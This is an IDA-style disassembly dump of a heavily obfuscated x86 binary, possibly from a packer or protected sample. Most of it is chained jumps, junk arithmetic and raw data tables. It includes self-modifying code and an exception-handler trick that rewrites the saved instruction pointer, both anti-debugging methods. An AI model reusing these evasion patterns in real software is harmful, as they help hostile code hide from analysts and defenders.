; FUNCTION CHUNK AT 0045A598 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A772 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B66E SIZE 0000000B BYTES

		mov	eax, 11h
		call	sub_4436E7
		test	al, al
		jz	nullsub_63

loc_44B826:				; CODE XREF: sub_443BAF-39EFj
		jmp	loc_43CD26
sub_44B814	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 81h
; ---------------------------------------------------------------------------
		retf
; ---------------------------------------------------------------------------
		db 92h,	0D2h, 7Dh
		dd 0FC4CE905h
		db 0FEh, 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_44B836	proc near		; CODE XREF: sub_448AAA+Dp
					; y2kk37jd:00452717j
		xchg	edx, [esp+0]
		pop	edx
		xor	ebx, 7B3061F2h
		xor	eax, ebx
		pop	ebx
		ror	eax, 3
		push	offset loc_445BA8
		jmp	nullsub_64
sub_44B836	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446C40

loc_44B850:				; CODE XREF: sub_446C40+44CFj
		xor	ecx, ebp
		sub	ecx, 0DE17F9FAh
		popf
		jmp	loc_454802
; END OF FUNCTION CHUNK	FOR sub_446C40
; ---------------------------------------------------------------------------

loc_44B85E:				; CODE XREF: y2kk37jd:0044C94Ej
		jbe	loc_45069D
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_44B864:				; CODE XREF: sub_44F3F5:loc_441BF8j
		test	ecx, ebx
		jmp	loc_44C0AB
; END OF FUNCTION CHUNK	FOR sub_44F3F5

; =============== S U B	R O U T	I N E =======================================



sub_44B86B	proc near		; CODE XREF: sub_4436FA+10j
					; y2kk37jd:00444CF2j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CDB0 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0043F194 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004405DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004431FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044370F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004486D9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004491E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E59E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454C43 SIZE 00000010 BYTES

		js	loc_44370F
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_4487FD
		mov	eax, 637A7446h
		call	sub_442C3E
		push	edi
		jmp	loc_4405DF
sub_44B86B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44B88B:				; CODE XREF: sub_45B7AA:loc_443D37j
		mov	edx, [esi]
		add	eax, edi
		push	ebp
		jmp	loc_440521
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44B895:				; CODE XREF: sub_44CDD5:loc_43BADAj
		jnz	loc_4469D4
		jmp	loc_43CD91
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44B8A0:				; CODE XREF: sub_45B7AA:loc_45B824j
		sub	edx, 0BEE30467h
		call	sub_44B55D

loc_44B8AB:				; CODE XREF: y2kk37jd:00454A69j
		jmp	sub_446AC6
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_44B8B0:				; CODE XREF: sub_43E679+1487Fj
		jmp	loc_45ADFB
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44B8B5:				; CODE XREF: sub_43F75D-19B3j
		jmp	loc_43CBF3
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------

loc_44B8BA:				; CODE XREF: y2kk37jd:0044F802j
		js	loc_450CCB
; START	OF FUNCTION CHUNK FOR sub_453583

loc_44B8C0:				; CODE XREF: sub_453583:loc_441759j
		xor	edi, 9C5C765Ah
		add	edi, ebp
		add	edi, 0D16048BEh
		jmp	loc_4555BF
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_44B8D3:				; CODE XREF: sub_44DBF8:loc_453CD9j
		mov	eax, [ebp-10h]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]

loc_44B8DC:				; CODE XREF: sub_445226:loc_457E2Bj
		call	sub_458FC0
		test	eax, eax
		jz	loc_458D82
		jmp	loc_45ACF3
; END OF FUNCTION CHUNK	FOR sub_44DBF8

; =============== S U B	R O U T	I N E =======================================



sub_44B8EE	proc near		; CODE XREF: y2kk37jd:00443BE8j
					; sub_444A2B+AD97p

; FUNCTION CHUNK AT 0043D144 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp+8]
		push	offset loc_43E173
		jmp	loc_43D144
sub_44B8EE	endp


; =============== S U B	R O U T	I N E =======================================



sub_44B8FF	proc near		; DATA XREF: sub_443AA7+17273o

; FUNCTION CHUNK AT 004520BD SIZE 0000000B BYTES

		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_444615
		jmp	loc_4520BD
sub_44B8FF	endp

; ---------------------------------------------------------------------------

locret_44B90E:				; CODE XREF: y2kk37jd:0043B190j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_44B90F:				; CODE XREF: sub_44001E:loc_4560DDj
		xchg	eax, [esp+18h+var_18]
		push	0
		push	0
		push	0
		push	0
		push	offset loc_4465F4
		jmp	loc_446E91
; END OF FUNCTION CHUNK	FOR sub_44001E

; =============== S U B	R O U T	I N E =======================================



sub_44B924	proc near		; CODE XREF: y2kk37jd:0043D7B6j
					; sub_451A53+6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B640 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043E265 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00442FFD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00443C38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DFC9 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044F012 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044FAE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454168 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045474F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E9C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A7C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A877 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B2D8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045C3E3 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		cmp	al, 0A4h
		jnz	loc_43B645
		mov	eax, [ebp-4]
		cmp	word ptr [eax],	2ECDh
		jz	loc_43B645
		jmp	loc_4493E2
sub_44B924	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44B943:				; CODE XREF: y2kk37jd:00454030j
		jnz	loc_449646

; =============== S U B	R O U T	I N E =======================================



sub_44B949	proc near		; CODE XREF: sub_459DF8+8p
		xchg	edx, [esp+0]
		pop	edx
		mov	ds:dword_44663C, eax
sub_44B949	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453B38

loc_44B952:				; CODE XREF: sub_453B38-397j
		xor	eax, eax
		push	ecx
		push	0A719B4B1h
		jmp	loc_43FE6C
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44B95F:				; CODE XREF: sub_44CDD5-F14Cj
					; sub_43ED86+9D14j
		jb	loc_43EB7E
		xchg	edi, ebx
		test	eax, ecx
		jmp	loc_447A5A
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_44B96E:				; CODE XREF: sub_455B08:loc_45C61Ej
		add	esi, 0BCE012FAh
		sbb	ebx, ebp
		jmp	loc_442997
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------

loc_44B97B:				; CODE XREF: y2kk37jd:0045B009j
		jnz	loc_454A53

loc_44B981:				; CODE XREF: y2kk37jd:loc_4422ACj
		push	esi
		push	0ADAD710Fh
		pop	esi
		rol	esi, 7
		jmp	loc_441EF0
; ---------------------------------------------------------------------------
		mov	ebx, 5B824F89h
		popf
		jmp	sub_442081
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44B99B:				; CODE XREF: sub_44113A:loc_446392j
		add	eax, ecx
		test	ebp, 0EB470559h
		jmp	loc_44634F
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------

loc_44B9A8:				; CODE XREF: y2kk37jd:0045487Fj
		sbb	eax, edx
		mov	[edi], ecx
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44B9AC:				; CODE XREF: sub_44B814:loc_454869j
		or	esi, 9D742C6Ah

loc_44B9B2:				; CODE XREF: y2kk37jd:loc_43D4C8j
		cmp	esi, 321EE790h
		jmp	loc_4486BC
; END OF FUNCTION CHUNK	FOR sub_44B814

; =============== S U B	R O U T	I N E =======================================



sub_44B9BD	proc near		; CODE XREF: sub_445226+1D6j
					; sub_442376:loc_459030p
		xchg	eax, [esp+0]

loc_44B9C0:				; CODE XREF: y2kk37jd:0045A804j
		pop	eax
		call	sub_4577FE
sub_44B9BD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453867

loc_44B9C6:				; CODE XREF: sub_453867:loc_444BCCj
		test	al, al
		jz	loc_446A7E
		jmp	loc_43B6F2
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44B9D3:				; CODE XREF: sub_4411C3:loc_442B92j
					; y2kk37jd:00442BA6j
		add	edi, 0FAA6946Bh
		or	edi, 0AFFABC86h
		call	sub_4423DA

loc_44B9E4:				; CODE XREF: sub_447D42-5D88j
		jmp	loc_44CCFB
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44B9E9:				; CODE XREF: sub_456809+3EB1j
		and	ebx, 21D4A6C0h
		or	ebx, esi
		rol	ebp, 1Ch
		jmp	loc_448B22
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44B9F9:				; CODE XREF: sub_44CDD5:loc_45AF32j
		push	offset loc_458AF2
		jmp	nullsub_359
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44BA03:				; CODE XREF: sub_43ED19+1C0ACj
		jno	loc_4422E1
		jns	loc_43C55D
		mov	ebp, edx
		jmp	loc_4585A3
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44BA16:				; CODE XREF: sub_45B7AA-152A2j
		lea	eax, nullsub_23
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_23
; ---------------------------------------------------------------------------

loc_44BA24:				; CODE XREF: sub_45B7AA:loc_457A0Cj
		mov	eax, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_440337

loc_44BA27:				; CODE XREF: sub_440337+1529Dj
		push	edx
		jmp	loc_43D643
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------

loc_44BA2D:				; CODE XREF: y2kk37jd:004450C4j
		jnz	loc_456363
		jmp	loc_44721D

; =============== S U B	R O U T	I N E =======================================



sub_44BA38	proc near		; CODE XREF: sub_40F23F:loc_40F293p
					; sub_40F2BC:loc_40F314p ...
		push	offset sub_453578
		jmp	nullsub_67
sub_44BA38	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_44BA42	proc near		; CODE XREF: sub_445226:loc_44A695j
		retn
sub_44BA42	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455556

loc_44BA43:				; CODE XREF: sub_455556+11j
		jmp	loc_4586D9
; END OF FUNCTION CHUNK	FOR sub_455556
; ---------------------------------------------------------------------------

loc_44BA48:				; CODE XREF: y2kk37jd:loc_457E30j
		push	0A5BB05F4h
		pop	esi
		add	esi, 0D64CB80Bh
		and	esi, 0FA691356h
		xor	esi, 7049F21Ah
		jmp	loc_43CE75
; ---------------------------------------------------------------------------

loc_44BA65:				; DATA XREF: sub_43E707:loc_45017Co
		mov	eax, [esp]
		push	edx
		call	sub_4537BC

loc_44BA6E:				; CODE XREF: y2kk37jd:0044C983j
		jmp	loc_44965F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_44BA73:				; CODE XREF: sub_451E9F:loc_449396j
		mov	eax, [ebp-20h]
		call	sub_4574B7
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_43EF77
; END OF FUNCTION CHUNK	FOR sub_451E9F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_320. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA4A

loc_44BA85:				; CODE XREF: sub_44AA4A+Fj
		rol	eax, 13h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44AA4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_44BA8A:				; CODE XREF: sub_44B489:loc_442734j
					; y2kk37jd:00453BDCj
		jmp	loc_441180
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------

loc_44BA8F:				; CODE XREF: y2kk37jd:0044EC89j
		jmp	loc_446692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C2D9

loc_44BA94:				; CODE XREF: sub_43C2D9+7BEDj
		jmp	loc_45806D
; END OF FUNCTION CHUNK	FOR sub_43C2D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44BA99:				; CODE XREF: y2kk37jd:004584C9j
					; sub_43EF4F+1980Cj
		rol	ecx, 1Dh
		add	ecx, 388AF898h
		or	ecx, 0C57A01E3h
		xor	ecx, 0F9EADEF8h
		jmp	loc_4487F8
; END OF FUNCTION CHUNK	FOR sub_43EF4F

; =============== S U B	R O U T	I N E =======================================



sub_44BAB3	proc near		; DATA XREF: sub_453867+8628o
		add	edx, 0DFCA3FF8h
		push	offset sub_4559A7
		jmp	nullsub_413
sub_44BAB3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45454E

loc_44BAC3:				; CODE XREF: sub_45454E+Fj
		xor	esi, 1D0D0E51h
		add	esi, 0DF363FE0h
		add	eax, esi
		pop	esi
		mov	dword ptr [eax], offset	dword_474244
		push	0
		push	0FCF26284h
		pop	eax
		jmp	loc_4585D9
; END OF FUNCTION CHUNK	FOR sub_45454E
; ---------------------------------------------------------------------------

loc_44BAE5:				; CODE XREF: y2kk37jd:loc_443D32j
		rol	edx, 2
		call	sub_44D54D
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_44BAED:				; CODE XREF: sub_44D627:loc_445F3Cj
		jz	loc_4573CF
		jmp	loc_4564A8
; END OF FUNCTION CHUNK	FOR sub_44D627
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44BAF9:				; CODE XREF: y2kk37jd:00440B94j
		jmp	loc_44EFAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44BAFE:				; CODE XREF: sub_43ED19-27B9j
		pop	eax
		rol	eax, 19h
		and	eax, 119D6405h
		xor	eax, 9E011683h
		add	eax, ebp
		add	eax, 6067E982h
		mov	eax, [eax]
		jmp	loc_45C2B6
; END OF FUNCTION CHUNK	FOR sub_43ED19
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44BB1E:				; CODE XREF: y2kk37jd:0043FCA4j
		shr	ebx, 10h
		popf
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44BB22:				; CODE XREF: sub_445787+4716j
		xor	ebx, 0EE202202h
		add	ebx, 6739C47Ch
		xchg	ebx, [esp+0]
		jmp	loc_44C1A3
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_44BB36:				; CODE XREF: y2kk37jd:0043EBD4j
		add	eax, 8BFDB018h
		mov	eax, [eax]
		mov	byte ptr [ebp+eax-100h], 0
		push	edi
		push	13F39E7Fh
		pop	edi
		jmp	loc_458351
; ---------------------------------------------------------------------------
		add	esi, 4A085840h
		jmp	sub_45801A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452665

loc_44BB5D:				; CODE XREF: sub_452665:loc_45C623j
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_444F4A
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_452665
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44BB77:				; CODE XREF: sub_4411C3:loc_458574j
		jz	loc_44DC67
		push	ecx
		test	edx, ebp
		jmp	loc_449D44
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_44BB85:				; CODE XREF: y2kk37jd:0043C415j
		xor	edx, 4CFE9824h
		jz	loc_44D48E
		xor	ebx, ecx
; START	OF FUNCTION CHUNK FOR sub_442B26

loc_44BB93:				; CODE XREF: sub_442B26:loc_43C404j
		add	ebx, 0C3630977h
		xor	ebx, 879EC5F8h
		or	ebx, 0E20FF8D4h
		jmp	loc_452D9F
; END OF FUNCTION CHUNK	FOR sub_442B26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44BBAA:				; CODE XREF: sub_43EF4F-258j
		jnb	loc_44C5E3
		jle	loc_44CBAF

loc_44BBB6:				; CODE XREF: sub_43EF4F:loc_43E5F2j
		cmp	dword ptr [ebp-108h], 6C436E6Fh
		jnz	loc_44C72F
		jmp	loc_44974C
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
		jnp	loc_44E7A6
		jmp	sub_44C2AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A65

loc_44BBD6:				; CODE XREF: sub_444A65+6j
		pop	ecx
		or	ecx, 951310BBh
		rol	ecx, 1
		add	ecx, 450DE720h
		jmp	loc_4574AD
; END OF FUNCTION CHUNK	FOR sub_444A65

; =============== S U B	R O U T	I N E =======================================



sub_44BBEA	proc near		; DATA XREF: sub_4477F9-2663o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045A13F SIZE 00000013 BYTES

		push	edx
		call	sub_459F8F
		push	2EE71127h
		xchg	ebp, [esp+4+var_4]
		jmp	loc_45A13F
sub_44BBEA	endp

; ---------------------------------------------------------------------------
		sbb	ebx, 0A183E532h
		push	2E76E1Bh
		jmp	sub_44B51A
; ---------------------------------------------------------------------------

loc_44BC0D:				; DATA XREF: sub_440B16+3o
		xchg	esi, [esp]
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_450BB0
		jmp	loc_44A293
; ---------------------------------------------------------------------------

loc_44BC26:				; CODE XREF: y2kk37jd:00441B36j
		js	loc_45A0A0
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_44BC2C:				; CODE XREF: sub_44C304:loc_441B22j
		rol	eax, 1Ch
		add	eax, 22161886h
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_44A860
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44BC3E:				; CODE XREF: sub_453867:loc_43DB9Ej
		push	6AB146CBh
		add	esi, edi
		sbb	edi, 0DD2427Bh
		cmp	esi, 0A9532CBBh
		jmp	loc_43EA75
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		push	edx
		sbb	edi, ebp
		jmp	sub_442A94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44BC5E:				; CODE XREF: y2kk37jd:loc_446D5Ej
					; sub_43C865:loc_448D38j
		rol	ebx, 12h
		add	ebx, 0C844BB39h
		xchg	ebx, [esp+0]
		jmp	sub_4476EE
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_44BC6F:				; CODE XREF: sub_44B03F:loc_44DBE7j
		or	esi, 0D6BDA3D7h
		test	ebx, 8C957D4Ch
		jmp	loc_445B5C
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44BC80:				; CODE XREF: sub_445787+14E32j
		xor	eax, 2A5F14D3h
		rol	eax, 0Ch
		push	esi
		push	0E7B3ACCFh
		jmp	loc_44C4DB
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_44BC94:				; CODE XREF: sub_44EE3D:loc_43DE60j
		pushf
		jmp	loc_45B70D
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------

loc_44BC9A:				; CODE XREF: y2kk37jd:004556E9j
		mov	eax, [esp]
		push	edx
		call	sub_4599BE
		push	4C75A2CEh
		sbb	eax, ebp
		jmp	loc_447497
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E0C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BE9

loc_44BCB5:				; CODE XREF: sub_455BE9+1j
		jmp	loc_44B68D
; END OF FUNCTION CHUNK	FOR sub_455BE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452995

loc_44BCBA:				; CODE XREF: sub_452995+8j
		jmp	loc_4511F4
; END OF FUNCTION CHUNK	FOR sub_452995
; ---------------------------------------------------------------------------

loc_44BCBF:				; CODE XREF: y2kk37jd:0043E954j
		jmp	loc_43EDCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	[eax-7800009Fh], dh
		add	al, 24h
		mov	edx, eax
		jmp	loc_45C272
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_44BCD5:				; CODE XREF: sub_457533-17EFBj
					; sub_44BD20:loc_44B38Aj
		push	offset loc_44A919
		jmp	loc_43F3A1
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DF5

loc_44BCDF:				; CODE XREF: sub_445DF5-476Dj
		pop	ebp
		push	ds:dword_44FC84
		retn
; END OF FUNCTION CHUNK	FOR sub_445DF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_44BCE7:				; CODE XREF: sub_4447EA+C6C1j
		jmp	loc_442446
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DF5

loc_44BCEC:				; CODE XREF: sub_445DF5+1j
		mov	ebp, esp
		push	eax
		push	8F6EEECAh
		pop	eax
		and	eax, ds:4000F2h
		jmp	loc_444D65
; END OF FUNCTION CHUNK	FOR sub_445DF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45913D

loc_44BD00:				; CODE XREF: sub_45913D-18FAj
		jz	loc_43B88E
		jmp	loc_448991
; END OF FUNCTION CHUNK	FOR sub_45913D
; ---------------------------------------------------------------------------
		call	sub_44B814
		call	sub_44572F
		push	offset loc_452E31
		jmp	locret_44A2E5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44BD20	proc near		; CODE XREF: sub_457524:loc_44862Dj
					; sub_44CC02+325p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D550 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D899 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043E18A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00443290 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B38A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044CC14 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DDAE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456AA6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458471 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A4F7 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	esi
		jnb	loc_44CC14
		mov	eax, [esp+0]
		jmp	loc_458471
sub_44BD20	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_44BD33:				; CODE XREF: sub_44594E:loc_443B1Dj
		jge	loc_4553AE

loc_44BD39:				; CODE XREF: sub_456A36-F559j
		jmp	loc_43F713
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
		shr	eax, 0Dh
		adc	edi, ebx
		jmp	loc_4553AA
; ---------------------------------------------------------------------------

loc_44BD48:				; CODE XREF: y2kk37jd:0045B777j
		xchg	edx, ebp
		sub	ecx, 256EDB3Bh
		jmp	loc_44650D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44BD55:				; CODE XREF: sub_45B7AA:loc_4530BCj
		js	loc_457A0C
		sbb	eax, 1D5FEED1h
		jmp	loc_4533E7
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		sub	eax, 0D48E09E7h
		jmp	loc_44CEAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45704E

loc_44BD71:				; CODE XREF: sub_45704E+9j
		mov	esp, ebp
		pop	ebp
		push	0B8659DB0h
		pop	eax
		or	eax, 70A41105h
		jmp	loc_45B408
; END OF FUNCTION CHUNK	FOR sub_45704E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444693

loc_44BD85:				; CODE XREF: sub_45689F:loc_43E530j
					; sub_444693:loc_43EF42j
		xor	eax, 4F7A5FB0h
		push	edi
		pushf
		push	0A5292E65h
		pop	edi
		and	edi, 0B8C4D161h
		add	edi, 60456A50h
		popf
		jmp	loc_44651F
; END OF FUNCTION CHUNK	FOR sub_444693
; ---------------------------------------------------------------------------
		db 7Dh,	45h, 33h
off_44BDA8	dd offset off_41E000	; DATA XREF: sub_44CF38:loc_44C8F9o
					; y2kk37jd:loc_459B1Bo
		dd 13h,	50h, 5Bh, 170h,	1, 8, 5, 18h, 1, 8, 9, 28h, 3
		dd 10h,	19h, 2 dup(0)
dword_44BDF0	dd 1070000h, 471051C1h,	0FFFF8010h, 0Bh, 0FFFF8010h, 1Fh
					; DATA XREF: sub_44CDD5+2C80o
		dd 0FFFF8010h, 18h, 0FFFF8010h,	29h, 0FFFF8010h, 4Bh, 0FFFF801Fh
		dd 17h,	0FFFF801Fh, 33h, 0FFFF801Fh, 13h, 0FFFF801Fh, 65h
		dd 0FFFF801Fh, 0Dh, 0FFFF801Fh,	1, 0FFFF801Fh, 6, 0FFFF801Fh
		dd 4, 0FFFF801Fh, 74h, 0FFFF801Fh, 34h,	0FFFF801Fh, 14h
		dd 0FFFF801Fh, 15h, 0FFFF801Fh,	0Fh, 0FFFF801Fh, 12h, 0FFFF801Fh
		dd 11h,	0FFFF801Fh, 0Ch, 0FFFF801Fh, 97h, 0FFFF801Fh, 0Bh
		dd 0FFFF801Fh, 0Ah, 0FFFF801Fh,	10h, 0FFFF801Fh, 9, 0FFFF801Fh
		dd 73h,	0FFFF801Fh, 5, 0FFFF801Fh, 2, 0FFFF801Fh, 3, 9E002Eh
		dd 801D01A0h, 97002Eh, 609D577Dh, 96002Eh, 0B24C760Ah
		dd 6003Eh, 2092F37Fh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_44BF08:				; CODE XREF: sub_443EAB+1704Cj
		jmp	loc_44E381
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------
		db 27h,	0B1h, 0D4h
dword_44BF10	dd 773D0000h, 62A2244Dh, 0B8233389h, 0C66319h, 1F7B0000h
					; DATA XREF: sub_43BFAE:loc_43BFBCo
